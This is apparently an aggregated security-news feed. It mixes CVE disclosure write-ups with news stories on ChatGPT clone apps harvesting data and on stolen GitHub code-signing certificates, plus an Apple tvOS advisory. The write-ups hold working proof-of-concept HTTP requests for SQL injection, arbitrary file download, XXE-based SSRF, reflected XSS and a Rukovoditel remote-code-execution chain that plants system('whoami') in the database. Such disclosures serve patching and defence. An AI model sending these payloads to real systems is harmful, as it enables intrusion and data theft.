Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /cha.php.

**Forget Heart Message Box 1.1 has multiple SQL injections****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

1.1

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.43

**Vulnerability Description AND recurrence:**

Vulnerability Documentation：_adminpost.php_

Parameter: name

POST /admin/loginpost.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.2.101/
Cookie: PHPSESSID=28s17sili7ldmc68goe212s593
Content-Length: 29
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 192.168.2.101
Connection: Keep-alive

login=&name=1232\*&pass=123456

  

Vulnerability Documentation：_cha.php_

Parameter: name

POST /cha.php HTTP/1.1
Host: 192.168.2.24
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.24
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.24/cha.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qhndee8uhjmf0g0nrul6nmcurs
Connection: close

name=1\*&go=%E6%9F%A5%E8%AF%A2%E7%95%99%E8%A8%80

**Restoration suggestions**

Filtering of user input or using magic methods.

CVE-2023-24956: Forget Heart Message Box 1.1 has multiple SQL injections · Issue #1 · Mortalwangxin/lives

Easy Images v2.0 was discovered to contain an arbitrary file download vulnerability via the component /application/down.php. This vulnerability is exploited via a crafted GET request.

**EasyImages2.0-arbitrary-file-download-vulnerability****Found on: 2022-12-27****Impact version**

EasyImages2.0 ≤ v2.6.7

**Analysis Report：**

_Vulnerability path: /application/down.php_

payload：

GET /application/down.php?dw=config/config.php HTTP/1.1
Host: 192.168.2.13
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm\_lvt\_c790ac2bdc2f385757ecd0183206108d=1672116632; Hm\_lpvt\_c790ac2bdc2f385757ecd0183206108d=1672149755
Connection: close

You can download any file in the host by passing the dw parameter to the get request

**Fixes**

Specify the download directory to download only for the specified directory, other directories are filtered and requests are rejected.

CVE-2022-48161: GitHub - sunset-move/EasyImages2.0-arbitrary-file-download-vulnerability: EasyImages2.0 arbitrary file download vulnerability

Netcad KEOS 1.0 is vulnerable to XML External Entity (XXE) resulting in SSRF with XXE (remote).

**Exploit Title: CVE-2022-47873 KEOS Software XXE****Exploit Author: Ömer Akincir****Team: Ömer Yılmaz****Version: 1.0 >=****Vuln Details: XXE****Description:**

KEOS application running on the web is vulnerable to XML External Entity (XXE) attack.

**Impact:**

An attacker can trigger SSRF over XXE using Proof Of Concept.

**PoC:**

    POST /KEOS/ HTTP/1.1
    Host:
    Content-Type: application/xml
    Soapaction: ""
    Content-Length: 160
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
    
    <?xml version="1.0" encoding="utf-8"?>
    
      <!DOCTYPE roottag PUBLIC "-//A//B//EN" "http://BURP-COLLOBRATOR-URL">
    
      <roottag>test</roottag>
    

Ref: https://github.com/waspthebughunter/CVE-2022-47873

CVE-2022-47873: CVE-2022-47873 KEOS Software XXE - Fordefence - Adli Bilişim Laboratuvarı

By Waqas
Several fake ChatGPT clone apps have surfaced on the official iOS and Play Stores, collecting user data and sending it to remote servers.
This is a post from HackRead.com Read the original post: ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store

On Android devices, one of the apps analyzed by researchers has more than 100,000 downloads, tracks, and shares location data with ByteDance and Amazon, etc.

ChatGPT, the AI software, has already taken the Internet by storm, and that is why cybercriminals are looking to exploit the opportunity for malicious purposes. But the bigger question is, does ChatGPT have official apps for iOS or Play Store? Short answer: No, but we asked ChatGPT about it.

For your information, Chat Generative Pre-Trained Transformer, aka **ChatGPT**, is a chatbot launched in November 2022 by OpenAI. It is part of OpenAI’s GPT-3 family of language models and is compatible with both reinforcement and supervised learning techniques.

According to Top10VPN, unofficial clones and fake apps of the ChatGPT chatbot are available on both the Apple App Store and Google Play Store when they search for the term “ChatGPT.”

The researchers analyzed the ten highest-ranking apps, most of which relied on the new ChatGPT-3 technology. They used open-source tools, such as **mitmproxy**, to examine network traffic in their testing environment and detect risky functionalities in the Android apps’ code.

Moreover, they also analyzed the clone apps’ privacy policies and store pages to understand each app’s data collection and sharing policies.

**_MORE Chatgpt NEWS_**

1.  **OpenAI’s ChatGPT Can Create Polymorphic Malware**
2.  **Hackers Want to abuse ChatGPT by Bypass Restrictions**
3.  **Hackers Exploiting OpenAI’s ChatGPT to Deploy Malware**

**Collecting Android Data**

On Android devices, two clone apps collect/share users’ IP addresses with 3rd parties, whereas one app, identified as ChatGPT AI Writing Assistant with more than 100,000 downloads, tracks/shares location data with ByteDance and Amazon, etc.

Three of these apps ask for permissions that compromise users’ privacy, including recording audio permission, even though in-app speech functions are unavailable.

Moreover, all clone apps feature code with privacy impacts and lack the relevant permissions, including access to location, camera, photos, videos, and read/write storage.

Furthermore, nine apps exploit OpenAI’s GPT-3 technology, which is currently free, and three apps charge for access. One of the apps offers an ad-free tier. The list of malicious Android apps shared by Top10VPN includes the following:

*   AI Chat Companion
*   ChatGPT 3: Chat GPT AI
*   Open AI Chat Gpt – AI 360
*   TalkGPT – Talk to ChatGPT
*   Open Chat – AI Chatbot App
*   ChatGPT AI Writing Assistant

The full list with in-depth details of how and which data these apps collect is **available here**.

**Collecting iOS data**

On iOS devices, the ten top-ranked clone apps collected shared data with inadequate privacy protections. Two apps logged Q&A content, and five allowed third-party trackers to fingerprint devices.

An app called Alfred – Chat with GPT 3 involved in collecting device info (Top10VPN)

According to Top10VPN’s **report**, more than 300 server requests were launched within four minutes by one app. Seven apps did not follow the data collection practices according to their official privacy labels. Nine apps exploited OpenAI’s GPT-3 technology, and eight apps charged up to $15,000 per year for access.

The list of malicious iOS apps shared by Top10VPN includes the following:

*   Open Chat – AI Chatbot
*   Alfred – Chat with GPT 3
*   Genie – GPT AI Assistant
*   TalkGPT – Talk to ChatGPT
*   Chat AI: Personal AI Assistant
*   Write For Me GPT AI Assistant
*   Wisdom Ai – Your AI Assistant

The full list with in-depth details of how and which data these apps collect is **available here**.

**How do These Apps Threaten User Privacy?**

All the top-ten ChatGPT apps in the **Google Play Store** collected shared data with poor privacy protections. The apps shared numerous data points about user devices, such as screen size or network operator.

This may appear harmless on its own, but it can be used for fingerprint devices. Though none of these apps have malicious tendencies, one app was found to be sharing data with ByteDance.

Similarly, many apps are charging the user to access an available free app, which raises ethical concerns. Regarding user data privacy, TalkGPT was the most offensive of all apps, as it tracks users’ precise location data and transfers it to ByteDance, Amazon, Appodeal, AdTech, and InMobi.

It also seeks permission to record audio and collects users’ IP addresses and device fingerprints, which it shares with five third parties, including AdColony, Facebook, Criteo, Everest Technologies, and Google.

In addition, many clone apps mine the personal data of ChatGPT’s userbase, which had exceeded one million users in less than a week of its launch.

1.  **Avast anti-virus acknowledges collecting user data**
2.  **Data Collection Costs Epic Games Half a Billion USD**
3.  **Top 10 Android Ed Apps That Collect Most User Data**
4.  **Android sends more data to Google than iOS to Apple**
5.  **How data collected in gaming can breach user privacy**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store

GitHub on Monday disclosed that unknown threat actors managed to exfiltrate encrypted code signing certificates pertaining to some versions of GitHub Desktop for Mac and Atom apps.
As a result, the company is taking the step of revoking the exposed certificates out of abundance of caution. The following versions of GitHub Desktop for Mac have been invalidated: 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6,

Security Incident / Encryption

GitHub on Monday disclosed that unknown threat actors managed to exfiltrate encrypted code signing certificates pertaining to some versions of GitHub Desktop for Mac and Atom apps.

As a result, the company is taking the step of revoking the exposed certificates out of abundance of caution. The following versions of GitHub Desktop for Mac have been invalidated: 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.0.7, 3.0.8, 3.1.0, 3.1.1, and 3.1.2.

Versions 1.63.0 and 1.63.1 of 1.63.0 of Atom are also expected to stop working as of February 2, 2023, requiring that users downgrade to a previous version (1.60.0) of Atom. GitHub Desktop for Windows is not affected.

The Microsoft-owned subsidiary said it detected unauthorized access to a set of deprecated repositories used in the planning and development of GitHub Desktop and Atom on December 7, 2022.

The repositories are said to have been cloned a day before by a compromised personal access token (PAT) associated with a machine account. None of the repositories contained customer data, and the compromised credentials have since been revoked. GitHub did not disclose how the token was breached.

"Several encrypted code signing certificates were stored in these repositories for use via Actions in our GitHub Desktop and Atom release workflows," GitHub's Alexis Wales said. "We have no evidence that the threat actor was able to decrypt or use these certificates."

It's worth pointing out that a successful decryption of the certificates could permit an adversary to sign trojanized applications with these certificates and pass them off as originating from GitHub.

The three compromised certificates – two Digicert code signing certificates used for Windows and one Apple Developer ID certificate – are set for revocation on February 2, 2023.

The code hosting platform also said it released a new version of the Desktop app on January 4, 2023, that's signed with new certificates that were not exposed to the threat actor. It further emphasized that no unauthorized changes were made to the code in these repositories.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GitHub Breach: Hackers Stole Code-Signing Certificates for GitHub Desktop and Atom

Rukovoditel v3.2.1 was discovered to contain a remote code execution (RCE) vulnerability in the component /rukovoditel/index.php?module=dashboard/ajax_request.

**Rukovoditel v3.2.1 has Remote Code Execution in ajax\_request.php**

Author: y1s3m0

vendors:

*   https://www.rukovoditel.net/
    
*   https://sourceforge.net/projects/rukovoditel/files/latest/download
    

**Payload**

database:rukovoditel

In the latest version of Rukovoditel, there is a remote command execution vulnerability that can be exploited simply by combining it with an SQL injection vulnerability. By executing the following command in the database, you can store the command you need. You just need to focus on "id", "type", and "configuration", and make sure that type="fieldtype\_ajax\_request" and configuration are the PHP command you want to execute.

INSERT INTO \`rukovoditel\`.\`app\_fields\`(\`id\`, \`entities\_id\`, \`forms\_tabs\_id\`, \`comments\_forms\_tabs\_id\`, \`forms\_rows\_position\`, \`type\`, \`name\`, \`short\_name\`, \`is\_heading\`, \`tooltip\`, \`tooltip\_display\_as\`, \`tooltip\_in\_item\_page\`, \`tooltip\_item\_page\`, \`notes\`, \`is\_required\`, \`required\_message\`, \`configuration\`, \`sort\_order\`, \`listing\_status\`, \`listing\_sort\_order\`, \`comments\_status\`, \`comments\_sort\_order\`) VALUES (999, 23, 28, 0, '', 'fieldtype\_ajax\_request', 'Subject', '', 1, '', '', 0, '', '', 1, '', '{\\"php\_code\\":\\"system(\\\\"whoami\\\\")\\"}', 3, 1, 3, 0, 0);

Then, by obtaining the administrator's "form\_session\_token" and cookie, you can construct a payload similar to the one below and execute the command stored in the database. Make sure that field\_id is the injected id above.

POST /index.php?module\=dashboard/ajax\_request&field\_id\=999 HTTP/1.1
Host: rukovoditel:8082
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9,ja;q=0.8,vi;q=0.7
Content-Length: 35
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: cookie\_test=please\_accept\_for\_session; sid=ecvuqrogd8e5v7jvlqr2mvhj5c; app\_remember\_me=1; app\_stay\_logged=1; app\_remember\_user=YWRtaW4%3D; app\_remember\_pass=JFAkRTRVRnlFMHhGQzYxMlFqWE5KUHJxLzJHck9oUGVTMA%3D%3D; XDEBUG\_SESSION=XDEBUG\_ECLIPSE
DNT: 1
Origin: http://rukovoditel:8082
Referer: http://rukovoditel:8082/index.php?module=custom\_php/code
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
form\_session\_token=ih7agGdyZZ

CVE-2022-48175: vulnfind/rce_ajax_request.md at main · y1s3m0/vulnfind

Zstore version 6.6.0 suffers from a cross site scripting vulnerability.

    ## Title: zstore-6.6.0 - XSS-Reflected## Development: nu11secur1ty## Date: 01.29.2023## Vendor: https://zippy.com.ua/## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4## Description:The value of manual insertion `point 1` is copied into the HTMLdocument as plain text between tags.The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted inthe manual insertion point 1.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Exploit:```GETGET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0aHTTP/2Host: store.zippy.com.uaCookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://store.zippy.com.ua/index.php?q=p:App/Pages/MainAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9```[+] Response:```HTTP/2 200 OKServer: nginxDate: Sun, 29 Jan 2023 07:27:55 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546Class \App\Pages\Chatgiflc<ahref="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><imgsrc=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>```## Proof and Exploit:[href](https://streamable.com/aadj5c)## Reference:[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)

Zstore 6.6.0 Cross Site Scripting

A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. This affects an unknown part of the file user\operations\payment_operation.php. The manipulation of the argument booking_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219729 was assigned to this vulnerability.

Login account: It is necessary to organize and test ordinary users to log in to the system

POST /otmsp/user/operations/payment\_operation.php HTTP/1.1
Host: 192.168.1.12
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID\=bi87aa4ksm22phibq5cdbmgce2
Connection: close
Content\-Type: application/x-www-form-urlencoded
Content\-Length: 96

submit=&booking\_id=1' AND GTID\_SUBSET(CONCAT('~',(SELECT DATABASE()),'~'),6055) AND 'uYsm'\='uYsm

CVE-2023-0570: online-tours-travels-management-system/user_operations_payment_operation_booking_id.md at main · linmoren/online-tours-travels-management-system

Apple Security Advisory 2023-01-24-1 - tvOS 16.3 addresses bypass, code execution, and information leakage vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-01-24-1 tvOS 16.3

tvOS 16.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213601.

AppleMobileFileIntegrity  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog)

ImageIO  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing an image may lead to a denial-of-service  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2023-23519: Yiğit Can YILMAZ (@yilmazcanyigit)

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to leak sensitive kernel state  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to determine kernel memory layout  
Description: An information disclosure issue was addressed by  
removing the vulnerable code.  
CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23504: Adam Doupé of ASU SEFCOM

Maps  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to bypass Privacy preferences  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23503: an anonymous researcher

Safari  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Visiting a website may lead to an app denial-of-service  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2023-23512: Adriatik Raci

Weather  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an  
anonymous researcher

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 245464  
CVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, Jiming  
Wang, JiKai Ren and Hang Shu of Institute of Computing Technology,  
Chinese Academy of Sciences

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 248268  
CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE  
WebKit Bugzilla: 248268  
CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE

Additional recognition

Kernel  
We would like to acknowledge Nick Stenning of Replicate for their  
assistance.

WebKit  
We would like to acknowledge Eliya Stein of Confiant for their  
assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPQS+MACgkQ4RjMIDke  
Nxl2xhAAu5swycPjzTAolynfVnOR8FvGiVeCUFfn2JpEFVXRiIMcZgQga7bb7cEk  
0Abcm9FfLAq4z7SBTXh9csi1erT0bbT2/DK8PhEDsZz9MInzxXUTN9+ZrWlN/PLJ  
ZIQZh1gwUGkf31DAaBQ15QYo6XukzwV++t1AkeY5CQsTEXf/rJhYH7E3kNWsqj+5  
B6vAw0Xw7hLsZwfAv7W2khhLtiBa5sxtuJKRPJ/4xjBKfWZaeVjjgsTC0LLUN/3l  
qxFI8H4QxQPxXtAt2O2wPGnR3WhfmDlGqgnYkj4IM8FlRnGedpD5O/kPoZNzRtKt  
z7pRORoHD+o3KOY3UkRZ19sJEWEkeWJxHO6htRf/IsgbX1/eQJnIqSuOeLRJ3EDY  
xCTUfiTU0NU3Iy/iDgpwllq4oU8rYeFJiPU4RNzndX+Z3+V/Tu9mc3rBax3A8gGi  
bN5dKB0bGNCV2MnOlpuy5E7u56cfMlH04Gtj0j8L05t9yxYKiCuBVNBL0KjJB/cF  
wjAl0ZoK8auWTDFKPJHGRGWtqR0svrV4qw5lPpQc+w26+xh8LHL8HzHr+pxHEZ75  
4CUxi9L7w4hWieZgHNyWUj4xIlqhrefk+M6QqwxwwKSB/z2eiaOBHSCaKDOvg9JU  
6w6VML1ezs/zpC5H0//PXTqK2o8XkaBNKQ0Ljx6zejIVwFbwHVQ=  
=WvwW  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-01-24-1

SiteServer CMS 7.1.3 is vulnerable to SQL Injection.

Vulnerability conditions  
SSCMS v7.1.3 +mysql+administrator privileges  
Vulnerability details

1.  Discover the entry through code auditing  
    SSCMS.Web/Controllers/Admin/Settings/Sites/SitesTablesController.GetColumns.cs exists tablename SQL statement call

2\. Called the GetCount method of SSCMS.Core/Services/DatabaseManager.cs

3\. After entering the Quote method of SSCMS.Core/Services/DatabaseManager.Parser.cs

4、Call Database.cs(GetQuotedIdentifier)->DbUtils.cs(GetQuotedIdentifier)->MySqlImpl.cs(GetQuotedIdentifier) ​​in turn Finally, the returned result has not yet been filtered and other operations on the sql statement

\` GET /api/admin/settings/sitesTables/1\* HTTP/1.1 Host: 192.168.3.129 Accept: application/json, text/javascript, \*/\*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Origin: http://192.168.3.129 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C\_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8 Referer: http://192.168.3.129/utils/search.html?word=1111 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W\_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH\_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I Connection: close \` poc in sqlmap

poc in burp  
GET /api/admin/settings/sitesTables/%31%25%27%20%41%4e%44%20%47%54%49%44%5f%53%55%42%53%45%54%28%43%4f%4e%43%41%54%28%30%78%36%38%36%31%37%36%36%35%32%30%37%33%37%31%36%63%32%30%36%39%36%65%36%61%36%35%36%33%37%34%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%34%32%33%38%3d%34%32%33%38%2c%31%29%29%29%2c%30%78%37%31%36%62%37%31%36%62%37%31%29%2c%34%32%33%38%29%20%41%4e%44%20%27%72%6a%62%67%25%27%3d%27%72%6a%62%67 HTTP/1.1 Host: 192.168.3.129 Accept: application/json, text/plain, */* Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MTY2NTA0LCJleHAiOjE2NjYyNTI5MDQsImlhdCI6MTY2NjE2NjUwNH0.ZyaN5rNgUQxxkfxp3-GEV_e3RdiKPG4BjVFKBPZkdTU User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Origin: http://192.168.3.129 Referer: http://192.168.3.129/ss-admin/?siteId=57 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close

Tag

#apple